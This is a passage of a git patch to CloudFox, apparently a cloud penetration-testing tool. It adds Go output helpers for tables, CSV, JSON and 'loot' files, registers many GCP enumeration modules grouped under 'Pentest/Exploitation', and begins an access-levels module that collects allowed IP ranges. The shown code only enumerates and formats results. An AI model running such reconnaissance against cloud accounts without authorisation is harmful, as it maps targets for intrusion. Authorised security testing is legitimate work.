return nil +} + +// StreamFinalizeTables writes final tables line-by-line to avoid memory issues. +// It reads each .tmp file and writes it directly to a tab-delimited .txt table. +// Note: does not print a pretty table +// Uses the new directory structure: cloudfox-output/{CloudProvider}/{Principal}/{ScopeIdentifier}/ +func StreamFinalizeTables( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + header []string, +) error { + + // Build scope identifier using same logic as HandleOutputSmart + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Build consistent output path using NEW structure + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + // Ensure final table directory exists + tableDir := filepath.Join(outDirectoryPath, "table") + if err := os.MkdirAll(tableDir, 0o755); err != nil { + return fmt.Errorf("failed to create table directory: %w", err) + } + + // Walk the output directory looking for .tmp files + err := filepath.Walk(outDirectoryPath, func(tmpPath string, info os.FileInfo, err error) error { + if err != nil { + return err + } + if info.IsDir() || !strings.HasSuffix(info.Name(), ".tmp") { + return nil + } + + // Derive final table file name + baseName := strings.TrimSuffix(info.Name(), ".tmp") + tablePath := filepath.Join(tableDir, baseName+".txt") + + // Open output .txt for writing + outFile, err := os.OpenFile(tablePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return fmt.Errorf("failed to open final table file %s: %w", tablePath, err) + } + defer outFile.Close() + + // Write header row + if len(header) > 0 { + _, _ = fmt.Fprintln(outFile, strings.Join(header, "\t")) + } + + // Stream each row from .tmp file line-by-line + tmpFile, err := os.Open(tmpPath) + if err != nil { + return fmt.Errorf("failed to open tmp file %s: %w", tmpPath, err) + } + defer tmpFile.Close() + + scanner := bufio.NewScanner(tmpFile) + for scanner.Scan() { + line := scanner.Text() + cols := strings.Split(line, ",") + // Remove any ANSI color codes + cols = removeColorCodesFromSlice(cols) + _, _ = fmt.Fprintln(outFile, strings.Join(cols, "\t")) + } + if scanErr := scanner.Err(); scanErr != nil { + return fmt.Errorf("error scanning tmp file %s: %w", tmpPath, scanErr) + } + + // Delete the temporary .tmp file after streaming + _ = os.Remove(tmpPath) + + return nil + }) + + return err +} + +// streamRenderTableWithHeader renders a tmp file into a table with a single header row. +func streamRenderTableWithHeader(tmpFilePath string, header []string, outFile *os.File, wrap bool) error { + t := table.New(outFile) + if !wrap { + t.SetColumnMaxWidth(1000) + } + + if len(header) > 0 { + t.SetHeaders(header...) + } + + t.SetRowLines(false) + t.SetDividers(table.UnicodeRoundedDividers) + t.SetAlignment(table.AlignLeft) + t.SetHeaderStyle(table.StyleBold) + + // Stream rows from tmp file + f, err := os.Open(tmpFilePath) + if err != nil { + return err + } + defer f.Close() + + scanner := bufio.NewScanner(f) + for scanner.Scan() { + line := scanner.Text() + row := strings.Split(line, ",") + t.AddRow(row...) + } + if err := scanner.Err(); err != nil { + return err + } + + t.Render() + return nil +} + +func AppendCSV(outputDir string, table TableFile) error { + csvDir := filepath.Join(outputDir, "csv") + if err := os.MkdirAll(csvDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(csvDir, table.Name+".csv") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + writer := csv.NewWriter(f) + // Only write header if file is new + info, err := f.Stat() + if err != nil { + return err + } + if info.Size() == 0 { + if err := writer.Write(table.Header); err != nil { + return err + } + } + + for _, row := range table.Body { + row = removeColorCodesFromSlice(row) + if err := writer.Write(row); err != nil { + return err + } + } + writer.Flush() + return writer.Error() +} + +func AppendLoot(outputDir string, loot LootFile) error { + lootDir := filepath.Join(outputDir, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(lootDir, loot.Name+".txt") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + if _, err := f.WriteString(loot.Contents + "\n"); err != nil { + return err + } + return nil +} + +func AppendJSON(outputDir string, table TableFile) error { + jsonDir := filepath.Join(outputDir, "json") + if err := os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(jsonDir, table.Name+".json") + var existing []map[string]string + + // Try to load existing JSON if file exists + if _, err := os.Stat(filePath); err == nil { + data, err := os.ReadFile(filePath) + if err != nil { + return err + } + if len(data) > 0 { + if err := json.Unmarshal(data, &existing); err != nil { + return err + } + } + } + + // Append new rows + for _, row := range table.Body { + rowMap := make(map[string]string) + for i, col := range row { + rowMap[table.Header[i]] = col + } + existing = append(existing, rowMap) + } + + jsonBytes, err := json.MarshalIndent(existing, "", " ") + if err != nil { + return err + } + + return os.WriteFile(filePath, jsonBytes, 0644) +} + +func AppendJSONL(outputDir string, table TableFile) error { + jsonDir := filepath.Join(outputDir, "json") + if err := os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(jsonDir, table.Name+".jsonl") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + for _, row := range table.Body { + rowMap := make(map[string]string) + for i, col := range row { + rowMap[table.Header[i]] = col + } + jsonBytes, _ := json.Marshal(rowMap) + if _, err := f.Write(append(jsonBytes, '\n')); err != nil { + return err + } + } + + return nil +} + +func AppendLootFile(outputDirectory, lootFileName, entry string) error { + // Ensure output directory exists + lootDir := filepath.Join(outputDirectory, "loot") + if err := os.MkdirAll(lootDir, 0755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + // Loot file path + lootPath := filepath.Join(lootDir, fmt.Sprintf("%s.txt", lootFileName)) + + // Lock so concurrent workers don't clobber each other + lootFileMu.Lock() + defer lootFileMu.Unlock() + + // Open in append mode + f, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + defer f.Close() + + // Write entry with newline + if _, err := f.WriteString(entry + "\n"); err != nil { + return fmt.Errorf("failed to write to loot file: %w", err) + } + + return nil +} + func removeColorCodes(input string) string { // Regular expression to match ANSI color codes ansiRegExp := regexp.MustCompile(`\x1b\[[0-9;]*m`) @@ -426,28 +851,6 @@ func (b *TableClient) createJSONFiles() { } } -// func (b *TableClient) writeJSONFiles() []string { -// var fullFilePaths []string - -// for _, file := range b.TableFiles { -// file.Body = removeColorCodesFromNestedSlice(file.Body) -// jsonBytes, err := json.Marshal(file.Body) -// if err != nil { -// log.Fatalf("error marshalling json: %s", err) -// } - -// _, err = file.JSONFilePointer.Write(jsonBytes) -// if err != nil { -// log.Fatalf("error writing json: %s", err) -// } - -// fullPath := path.Join(b.DirectoryName, "json", fmt.Sprintf("%s.json", file.Name)) -// fullFilePaths = append(fullFilePaths, fullPath) -// } - -// return fullFilePaths -// } - func (b *TableClient) writeJSONFiles() []string { var fullFilePaths []string @@ -519,3 +922,264 @@ func WriteJsonlFile(file *os.File, data interface{}) error { } return nil } + +func sanitizeFileName(name string) string { + // replace / and \ with _ + re := regexp.MustCompile(`[\\/]+`) + return re.ReplaceAllString(name, "_") +} + +// ============================================================================ +// NEW OUTPUT FUNCTIONS V2 - Multi-cloud support with intelligent routing +// ============================================================================ + +// HandleOutputV2 is the new generic output function that supports multi-cloud +// environments (Azure, AWS, GCP) with proper scope handling. +// This function provides a cleaner directory structure based on scope type. +// +// Directory structure: +// - Azure (tenant mode): cloudfox-output/Azure/{UPN}/{TenantName}/module.csv +// - Azure (subscription mode): cloudfox-output/Azure/{UPN}/{SubscriptionName}/module.csv +// - AWS (org mode): cloudfox-output/AWS/{Principal}/{OrgID}/module.csv +// - AWS (account mode): cloudfox-output/AWS/{Principal}/{AccountName}/module.csv +// - GCP (org mode): cloudfox-output/GCP/{Principal}/{OrgID}/module.csv +// - GCP (project mode): cloudfox-output/GCP/{Principal}/{ProjectName}/module.csv +func HandleOutputV2( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, // "tenant", "subscription", "organization", "account", "project" + scopeIdentifiers []string, // Tenant IDs, Subscription IDs, Account IDs, Project IDs + scopeNames []string, // Friendly names for scopes + principal string, // UPN or IAM user + dataToOutput CloudfoxOutput, +) error { + // Build the results identifier based on scope + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Build output directory path with new structure + // Format: cloudfox-output/{CloudProvider}/{Principal}/{ResultsIdentifier}/ + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + tables := dataToOutput.TableFiles() + lootFiles := dataToOutput.LootFiles() + + // Determine base module name from first table file (for backwards compatibility) + baseCloudfoxModule := "" + if len(tables) > 0 { + baseCloudfoxModule = tables[0].Name + } + + outputClient := OutputClient{ + Verbosity: verbosity, + CallingModule: baseCloudfoxModule, + Table: TableClient{ + Wrap: wrap, + DirectoryName: outDirectoryPath, + TableFiles: tables, + }, + Loot: LootClient{ + DirectoryName: outDirectoryPath, + LootFiles: lootFiles, + }, + } + + // Handle output based on the verbosity level + outputClient.WriteFullOutput(tables, lootFiles) + return nil +} + +// HandleOutputSmart automatically selects the best output method based on dataset size. +// This is the RECOMMENDED function for all modules to use. +// +// Decision thresholds: +// - < 50,000 rows: Uses HandleOutputV2 (normal in-memory) +// - >= 50,000 rows: Uses HandleStreamingOutput (memory-efficient streaming) +// - >= 500,000 rows: Logs warning about large dataset +// - >= 1,000,000 rows: Logs critical warning, suggests optimization flags +func HandleOutputSmart( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + dataToOutput CloudfoxOutput, +) error { + logger := NewLogger() + + // Count total rows across all table files + totalRows := 0 + for _, tableFile := range dataToOutput.TableFiles() { + totalRows += len(tableFile.Body) + } + + // Log dataset size if verbose + if verbosity >= 2 { + logger.InfoM(fmt.Sprintf("Dataset size: %s rows", formatNumberWithCommas(totalRows)), "output") + } + + // Decision tree based on row count + if totalRows >= 1000000 { + logger.InfoM(fmt.Sprintf("WARNING: Very large dataset detected (%s rows). Consider using per-scope flags for better performance.", + formatNumberWithCommas(totalRows)), "output") + } else if totalRows >= 500000 { + logger.InfoM(fmt.Sprintf("WARNING: Large dataset detected (%s rows). Using streaming output.", + formatNumberWithCommas(totalRows)), "output") + } + + // Auto-select output method based on dataset size + if totalRows >= 50000 { + if verbosity >= 1 { + logger.InfoM(fmt.Sprintf("Using streaming output for memory efficiency (%s rows)", + formatNumberWithCommas(totalRows)), "output") + } + + // Use streaming output for large datasets (new signature) + return HandleStreamingOutput( + cloudProvider, + format, + outputDirectory, + verbosity, + wrap, + scopeType, + scopeIdentifiers, + scopeNames, + principal, + dataToOutput, + ) + } + + // Use normal in-memory output for smaller datasets + return HandleOutputV2( + cloudProvider, + format, + outputDirectory, + verbosity, + wrap, + scopeType, + scopeIdentifiers, + scopeNames, + principal, + dataToOutput, + ) +} + +// buildResultsIdentifier creates a results identifier from scope information. +// It prefers friendly names over IDs for better readability. +// +// Fallback hierarchy: +// - Azure: Tenant Name → Tenant GUID → Subscription Name → Subscription GUID +// - AWS: Org Name → Org ID → Account Alias → Account ID +// - GCP: Org Name → Org ID → Project Name → Project ID +// +// Directory Naming Convention: +// - Tenant-level: [T]{TenantName} or [T]{TenantGUID} +// - Subscription-level: [S]{SubscriptionName} or [S]{SubscriptionGUID} +// - Organization-level: [O]-{OrgName} or [O]-{OrgID} +// - Account-level: [A]-{AccountName} or [A]-{AccountID} +// - Project-level: [P]-{ProjectName} or [P]-{ProjectID} +func buildResultsIdentifier(scopeType string, identifiers, names []string) string { + var rawName string + + // Prefer friendly name if available + if len(names) > 0 && names[0] != "" { + rawName = names[0] + } else if len(identifiers) > 0 && identifiers[0] != "" { + // Fallback to identifier + rawName = identifiers[0] + } else { + // Ultimate fallback + rawName = "unknown-scope" + } + + // Sanitize the name for Windows/Linux compatibility + sanitizedName := sanitizeDirectoryName(rawName) + + // Add scope prefix based on scope type + prefix := getScopePrefix(scopeType) + if prefix != "" { + return prefix + sanitizedName + } + + return sanitizedName +} + +// getScopePrefix returns the appropriate prefix for a given scope type +func getScopePrefix(scopeType string) string { + switch scopeType { + case "tenant": + return "[T]" + case "subscription": + return "[S]" + case "organization": + return "[O]" + case "account": + return "[A]" + case "project": + return "[P]" + default: + return "" + } +} + +// sanitizeDirectoryName removes or replaces characters that are invalid in Windows/Linux directory names +// Invalid characters: < > : " / \ | ? * +// Also trims leading/trailing spaces and dots (Windows restriction) +func sanitizeDirectoryName(name string) string { + // Replace invalid characters with underscore + invalidChars := []string{"<", ">", ":", "\"", "/", "\\", "|", "?", "*"} + sanitized := name + for _, char := range invalidChars { + sanitized = strings.ReplaceAll(sanitized, char, "_") + } + + // Trim leading/trailing spaces and dots (Windows doesn't allow these) + sanitized = strings.Trim(sanitized, " .") + + // If the name is empty after sanitization, use a default + if sanitized == "" { + sanitized = "unnamed" + } + + return sanitized +} + +// formatNumberWithCommas formats a number with comma separators for readability. +// Example: 1000000 -> "1,000,000" +func formatNumberWithCommas(n int) string { + // Convert to string + s := fmt.Sprintf("%d", n) + + // Handle negative numbers + negative := false + if s[0] == '-' { + negative = true + s = s[1:] + } + + // Add commas every 3 digits from right + var result []rune + for i, digit := range s { + if i > 0 && (len(s)-i)%3 == 0 { + result = append(result, ',') + } + result = append(result, digit) + } + + if negative { + return "-" + string(result) + } + return string(result) +} From 69c9070009deb46d6c009d2015db40c7858f936f Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Sun, 28 Dec 2025 15:23:44 -0500 Subject: [PATCH 02/48] updates --- .gitignore | 5 +- cli/gcp.go | 65 ++ gcp/commands/accesslevels.go | 262 ++++++ gcp/commands/apikeys.go | 517 +++++++++++ gcp/commands/assetinventory.go | 309 ++++++ gcp/commands/beyondcorp.go | 183 ++++ gcp/commands/bigtable.go | 135 +++ gcp/commands/bucketenum.go | 391 ++++++++ gcp/commands/certmanager.go | 433 +++++++++ gcp/commands/cloudarmor.go | 398 ++++++++ gcp/commands/cloudbuild.go | 411 ++++++++ gcp/commands/cloudrun.go | 503 ++++++++++ gcp/commands/cloudsql.go | 473 ++++++++++ gcp/commands/composer.go | 211 +++++ gcp/commands/crossproject.go | 419 +++++++++ gcp/commands/customroles.go | 391 ++++++++ gcp/commands/dataflow.go | 199 ++++ gcp/commands/dataproc.go | 218 +++++ gcp/commands/dns.go | 398 ++++++++ gcp/commands/domainwidedelegation.go | 310 +++++++ gcp/commands/endpoints.go | 665 +++++++++++++ gcp/commands/filestore.go | 136 +++ gcp/commands/firewall.go | 582 ++++++++++++ gcp/commands/functions.go | 595 ++++++++++++ gcp/commands/gke.go | 584 ++++++++++++ gcp/commands/hmackeys.go | 274 ++++++ gcp/commands/iap.go | 185 ++++ gcp/commands/instances.go | 323 ++++++- gcp/commands/kms.go | 445 +++++++++ gcp/commands/loadbalancers.go | 269 ++++++ gcp/commands/logging.go | 442 +++++++++ gcp/commands/logginggaps.go | 345 +++++++ gcp/commands/memorystore.go | 179 ++++ gcp/commands/networkendpoints.go | 409 ++++++++ gcp/commands/notebooks.go | 233 +++++ gcp/commands/organizations.go | 378 ++++++++ gcp/commands/orgpolicies.go | 325 +++++++ gcp/commands/permissions.go | 103 ++ gcp/commands/privesc.go | 332 +++++++ gcp/commands/publicresources.go | 345 +++++++ gcp/commands/pubsub.go | 482 ++++++++++ gcp/commands/scheduler.go | 393 ++++++++ gcp/commands/serviceaccounts.go | 815 ++++++++++++++++ gcp/commands/serviceagents.go | 326 +++++++ gcp/commands/sourcerepos.go | 252 +++++ gcp/commands/spanner.go | 135 +++ gcp/commands/sshoslogin.go | 378 ++++++++ gcp/commands/vpcnetworks.go | 328 +++++++ gcp/commands/vpcsc.go | 267 ++++++ gcp/commands/workloadidentity.go | 878 ++++++++++++++++++ .../accessPolicyService.go | 282 ++++++ gcp/services/apikeysService/apikeysService.go | 322 +++++++ gcp/services/assetService/assetService.go | 370 ++++++++ .../beyondcorpService/beyondcorpService.go | 234 +++++ .../bigtableService/bigtableService.go | 94 ++ .../bucketEnumService/bucketEnumService.go | 278 ++++++ .../certManagerService/certManagerService.go | 355 +++++++ .../cloudArmorService/cloudArmorService.go | 286 ++++++ .../cloudbuildService/cloudbuildService.go | 396 ++++++++ .../cloudrunService/cloudrunService.go | 359 +++++++ .../cloudsqlService/cloudsqlService.go | 267 ++++++ .../composerService/composerService.go | 215 +++++ .../computeEngineService.go | 264 +++++- .../crossProjectService.go | 423 +++++++++ .../customRolesService/customRolesService.go | 284 ++++++ .../dataflowService/dataflowService.go | 178 ++++ .../dataprocService/dataprocService.go | 316 +++++++ gcp/services/dnsService/dnsService.go | 174 ++++ .../domainWideDelegationService.go | 228 +++++ .../filestoreService/filestoreService.go | 96 ++ .../functionsService/functionsService.go | 379 ++++++++ gcp/services/gkeService/gkeService.go | 466 ++++++++++ gcp/services/hmacService/hmacService.go | 159 ++++ gcp/services/iamService/iamService.go | 235 +++++ gcp/services/iapService/iapService.go | 286 ++++++ gcp/services/kmsService/kmsService.go | 283 ++++++ .../loadbalancerService.go | 375 ++++++++ .../loggingGapsService/loggingGapsService.go | 472 ++++++++++ gcp/services/loggingService/loggingService.go | 255 +++++ .../memorystoreService/memorystoreService.go | 140 +++ .../networkEndpointsService.go | 373 ++++++++ gcp/services/networkService/networkService.go | 336 ++++++- .../notebooksService/notebooksService.go | 294 ++++++ .../organizationsService.go | 453 +++++++++ .../orgpolicyService/orgpolicyService.go | 282 ++++++ gcp/services/privescService/privescService.go | 442 +++++++++ .../publicResourcesService.go | 538 +++++++++++ gcp/services/pubsubService/pubsubService.go | 313 +++++++ .../schedulerService/schedulerService.go | 164 ++++ .../serviceAgentsService.go | 294 ++++++ .../sourceReposService/sourceReposService.go | 141 +++ gcp/services/spannerService/spannerService.go | 84 ++ .../sshOsLoginService/sshOsLoginService.go | 377 ++++++++ gcp/services/vpcService/vpcService.go | 493 ++++++++++ gcp/services/vpcscService/vpcscService.go | 346 +++++++ .../workloadIdentityService.go | 383 ++++++++ globals/gcp.go | 41 +- go.mod | 5 + go.sum | 8 + 99 files changed, 31448 insertions(+), 24 deletions(-) create mode 100644 gcp/commands/accesslevels.go create mode 100644 gcp/commands/apikeys.go create mode 100644 gcp/commands/assetinventory.go create mode 100644 gcp/commands/beyondcorp.go create mode 100644 gcp/commands/bigtable.go create mode 100644 gcp/commands/bucketenum.go create mode 100644 gcp/commands/certmanager.go create mode 100644 gcp/commands/cloudarmor.go create mode 100644 gcp/commands/cloudbuild.go create mode 100644 gcp/commands/cloudrun.go create mode 100644 gcp/commands/cloudsql.go create mode 100644 gcp/commands/composer.go create mode 100644 gcp/commands/crossproject.go create mode 100644 gcp/commands/customroles.go create mode 100644 gcp/commands/dataflow.go create mode 100644 gcp/commands/dataproc.go create mode 100644 gcp/commands/dns.go create mode 100644 gcp/commands/domainwidedelegation.go create mode 100644 gcp/commands/endpoints.go create mode 100644 gcp/commands/filestore.go create mode 100644 gcp/commands/firewall.go create mode 100644 gcp/commands/functions.go create mode 100644 gcp/commands/gke.go create mode 100644 gcp/commands/hmackeys.go create mode 100644 gcp/commands/iap.go create mode 100644 gcp/commands/kms.go create mode 100644 gcp/commands/loadbalancers.go create mode 100644 gcp/commands/logging.go create mode 100644 gcp/commands/logginggaps.go create mode 100644 gcp/commands/memorystore.go create mode 100644 gcp/commands/networkendpoints.go create mode 100644 gcp/commands/notebooks.go create mode 100644 gcp/commands/organizations.go create mode 100644 gcp/commands/orgpolicies.go create mode 100644 gcp/commands/privesc.go create mode 100644 gcp/commands/publicresources.go create mode 100644 gcp/commands/pubsub.go create mode 100644 gcp/commands/scheduler.go create mode 100644 gcp/commands/serviceaccounts.go create mode 100644 gcp/commands/serviceagents.go create mode 100644 gcp/commands/sourcerepos.go create mode 100644 gcp/commands/spanner.go create mode 100644 gcp/commands/sshoslogin.go create mode 100644 gcp/commands/vpcnetworks.go create mode 100644 gcp/commands/vpcsc.go create mode 100644 gcp/commands/workloadidentity.go create mode 100644 gcp/services/accessPolicyService/accessPolicyService.go create mode 100644 gcp/services/apikeysService/apikeysService.go create mode 100644 gcp/services/assetService/assetService.go create mode 100644 gcp/services/beyondcorpService/beyondcorpService.go create mode 100644 gcp/services/bigtableService/bigtableService.go create mode 100644 gcp/services/bucketEnumService/bucketEnumService.go create mode 100644 gcp/services/certManagerService/certManagerService.go create mode 100644 gcp/services/cloudArmorService/cloudArmorService.go create mode 100644 gcp/services/cloudbuildService/cloudbuildService.go create mode 100644 gcp/services/cloudrunService/cloudrunService.go create mode 100644 gcp/services/cloudsqlService/cloudsqlService.go create mode 100644 gcp/services/composerService/composerService.go create mode 100644 gcp/services/crossProjectService/crossProjectService.go create mode 100644 gcp/services/customRolesService/customRolesService.go create mode 100644 gcp/services/dataflowService/dataflowService.go create mode 100644 gcp/services/dataprocService/dataprocService.go create mode 100644 gcp/services/dnsService/dnsService.go create mode 100644 gcp/services/domainWideDelegationService/domainWideDelegationService.go create mode 100644 gcp/services/filestoreService/filestoreService.go create mode 100644 gcp/services/functionsService/functionsService.go create mode 100644 gcp/services/gkeService/gkeService.go create mode 100644 gcp/services/hmacService/hmacService.go create mode 100644 gcp/services/iapService/iapService.go create mode 100644 gcp/services/kmsService/kmsService.go create mode 100644 gcp/services/loadbalancerService/loadbalancerService.go create mode 100644 gcp/services/loggingGapsService/loggingGapsService.go create mode 100644 gcp/services/loggingService/loggingService.go create mode 100644 gcp/services/memorystoreService/memorystoreService.go create mode 100644 gcp/services/networkEndpointsService/networkEndpointsService.go create mode 100644 gcp/services/notebooksService/notebooksService.go create mode 100644 gcp/services/organizationsService/organizationsService.go create mode 100644 gcp/services/orgpolicyService/orgpolicyService.go create mode 100644 gcp/services/privescService/privescService.go create mode 100644 gcp/services/publicResourcesService/publicResourcesService.go create mode 100644 gcp/services/pubsubService/pubsubService.go create mode 100644 gcp/services/schedulerService/schedulerService.go create mode 100644 gcp/services/serviceAgentsService/serviceAgentsService.go create mode 100644 gcp/services/sourceReposService/sourceReposService.go create mode 100644 gcp/services/spannerService/spannerService.go create mode 100644 gcp/services/sshOsLoginService/sshOsLoginService.go create mode 100644 gcp/services/vpcService/vpcService.go create mode 100644 gcp/services/vpcscService/vpcscService.go create mode 100644 gcp/services/workloadIdentityService/workloadIdentityService.go diff --git a/.gitignore b/.gitignore index 9dac55a5..cd9cead3 100644 --- a/.gitignore +++ b/.gitignore @@ -62,8 +62,11 @@ terraform.rc .DS_Store untracked/* +*tmp* +tmp/* output/* *cloudfox-output* +cloudfox-* cloudfox *.log *.bak @@ -75,4 +78,4 @@ dist/ # graphvis files *.gv -*.svg \ No newline at end of file +*.svg diff --git a/cli/gcp.go b/cli/gcp.go index ee5da707..c48c13b7 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -97,6 +97,7 @@ func init() { // Available commands GCPCommands.AddCommand( + // Core/existing commands commands.GCPBucketsCommand, commands.GCPArtifactRegistryCommand, commands.GCPBigQueryCommand, @@ -105,6 +106,70 @@ func init() { commands.GCPPermissionsCommand, commands.GCPInstancesCommand, commands.GCPWhoAmICommand, + + // New compute/serverless commands + commands.GCPFunctionsCommand, + commands.GCPCloudRunCommand, + commands.GCPGKECommand, + commands.GCPCloudSQLCommand, + + // New infrastructure commands + commands.GCPPubSubCommand, + commands.GCPKMSCommand, + commands.GCPLoggingCommand, + commands.GCPSchedulerCommand, + commands.GCPDNSCommand, + commands.GCPFirewallCommand, + commands.GCPServiceAccountsCommand, + commands.GCPAPIKeysCommand, + commands.GCPEndpointsCommand, + commands.GCPWorkloadIdentityCommand, + commands.GCPOrganizationsCommand, + commands.GCPCloudBuildCommand, + commands.GCPMemorystoreCommand, + commands.GCPFilestoreCommand, + commands.GCPSpannerCommand, + commands.GCPBigtableCommand, + + // Data processing commands + commands.GCPDataflowCommand, + commands.GCPComposerCommand, + + // Security/Compliance commands + commands.GCPVPCSCCommand, + commands.GCPAssetInventoryCommand, + + // Network/Infrastructure commands + commands.GCPLoadBalancersCommand, + commands.GCPVPCNetworksCommand, + + // ML/Data Science commands + commands.GCPNotebooksCommand, + commands.GCPDataprocCommand, + + // Zero Trust/Access commands + commands.GCPIAPCommand, + commands.GCPBeyondCorpCommand, + commands.GCPAccessLevelsCommand, + + // Pentest/Exploitation commands + commands.GCPHMACKeysCommand, + commands.GCPPrivescCommand, + commands.GCPOrgPoliciesCommand, + commands.GCPBucketEnumCommand, + commands.GCPCrossProjectCommand, + commands.GCPCustomRolesCommand, + commands.GCPPublicResourcesCommand, + commands.GCPLoggingGapsCommand, + commands.GCPSourceReposCommand, + commands.GCPSSHOsLoginCommand, + commands.GCPServiceAgentsCommand, + commands.GCPDomainWideDelegationCommand, + commands.GCPNetworkEndpointsCommand, + commands.GCPCloudArmorCommand, + commands.GCPCertManagerCommand, + + // All checks (last) GCPAllChecksCommand, ) } diff --git a/gcp/commands/accesslevels.go b/gcp/commands/accesslevels.go new file mode 100644 index 00000000..3a2bf201 --- /dev/null +++ b/gcp/commands/accesslevels.go @@ -0,0 +1,262 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + accesspolicyservice "github.com/BishopFox/cloudfox/gcp/services/accessPolicyService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var accessLevelOrgID string + +var GCPAccessLevelsCommand = &cobra.Command{ + Use: globals.GCP_ACCESSLEVELS_MODULE_NAME, + Aliases: []string{"access-levels", "conditional-access", "ca"}, + Short: "Enumerate Access Context Manager access levels", + Long: `Enumerate Access Context Manager access levels (conditional access policies). + +Features: +- Lists all access levels in the organization +- Shows IP-based, device-based, and identity conditions +- Identifies overly permissive access levels +- Analyzes device policy requirements + +Note: Requires organization ID (--org flag).`, + Run: runGCPAccessLevelsCommand, +} + +func init() { + GCPAccessLevelsCommand.Flags().StringVar(&accessLevelOrgID, "org", "", "Organization ID (required)") +} + +type AccessLevelsModule struct { + gcpinternal.BaseGCPModule + OrgID string + AccessLevels []accesspolicyservice.AccessLevelInfo + LootMap map[string]*internal.LootFile +} + +type AccessLevelsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AccessLevelsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AccessLevelsOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPAccessLevelsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ACCESSLEVELS_MODULE_NAME) + if err != nil { + return + } + + if accessLevelOrgID == "" { + cmdCtx.Logger.ErrorM("Organization ID is required. Use --org flag.", globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + + module := &AccessLevelsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgID: accessLevelOrgID, + AccessLevels: []accesspolicyservice.AccessLevelInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *AccessLevelsModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Enumerating access levels for organization: %s", m.OrgID), globals.GCP_ACCESSLEVELS_MODULE_NAME) + + svc := accesspolicyservice.New() + + levels, err := svc.ListAccessLevels(m.OrgID) + if err != nil { + logger.ErrorM(fmt.Sprintf("Could not list access levels: %v", err), globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + + m.AccessLevels = levels + + if len(m.AccessLevels) == 0 { + logger.InfoM("No access levels found", globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + + for _, level := range m.AccessLevels { + m.addToLoot(level) + } + + permissiveCount := 0 + for _, level := range m.AccessLevels { + if level.RiskLevel == "HIGH" || level.RiskLevel == "MEDIUM" { + permissiveCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d access level(s) (%d potentially permissive)", + len(m.AccessLevels), permissiveCount), globals.GCP_ACCESSLEVELS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *AccessLevelsModule) initializeLootFiles() { + m.LootMap["access-levels"] = &internal.LootFile{ + Name: "access-levels", + Contents: "# Access Levels (Conditional Access Policies)\n# Generated by CloudFox\n\n", + } + m.LootMap["allowed-ips"] = &internal.LootFile{ + Name: "access-level-allowed-ips", + Contents: "", + } +} + +func (m *AccessLevelsModule) addToLoot(level accesspolicyservice.AccessLevelInfo) { + m.LootMap["access-levels"].Contents += fmt.Sprintf( + "# Level: %s\n# Title: %s\n# Policy: %s\n# Combining: %s\n# Conditions: %d\n\n", + level.Name, level.Title, level.PolicyName, level.CombiningFunction, len(level.Conditions)) + + for _, condition := range level.Conditions { + for _, ip := range condition.IPSubnetworks { + m.LootMap["allowed-ips"].Contents += fmt.Sprintf("%s # %s\n", ip, level.Name) + } + } +} + +func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Access Levels table + header := []string{"Name", "Title", "Policy", "Combining", "Conditions", "Device Policy", "Risk"} + var body [][]string + for _, level := range m.AccessLevels { + hasDevicePolicy := "No" + for _, cond := range level.Conditions { + if cond.DevicePolicy != nil { + hasDevicePolicy = "Yes" + break + } + } + + combiningFunc := level.CombiningFunction + if combiningFunc == "" { + combiningFunc = "AND" + } + + body = append(body, []string{ + level.Name, + level.Title, + level.PolicyName, + combiningFunc, + fmt.Sprintf("%d", len(level.Conditions)), + hasDevicePolicy, + level.RiskLevel, + }) + } + 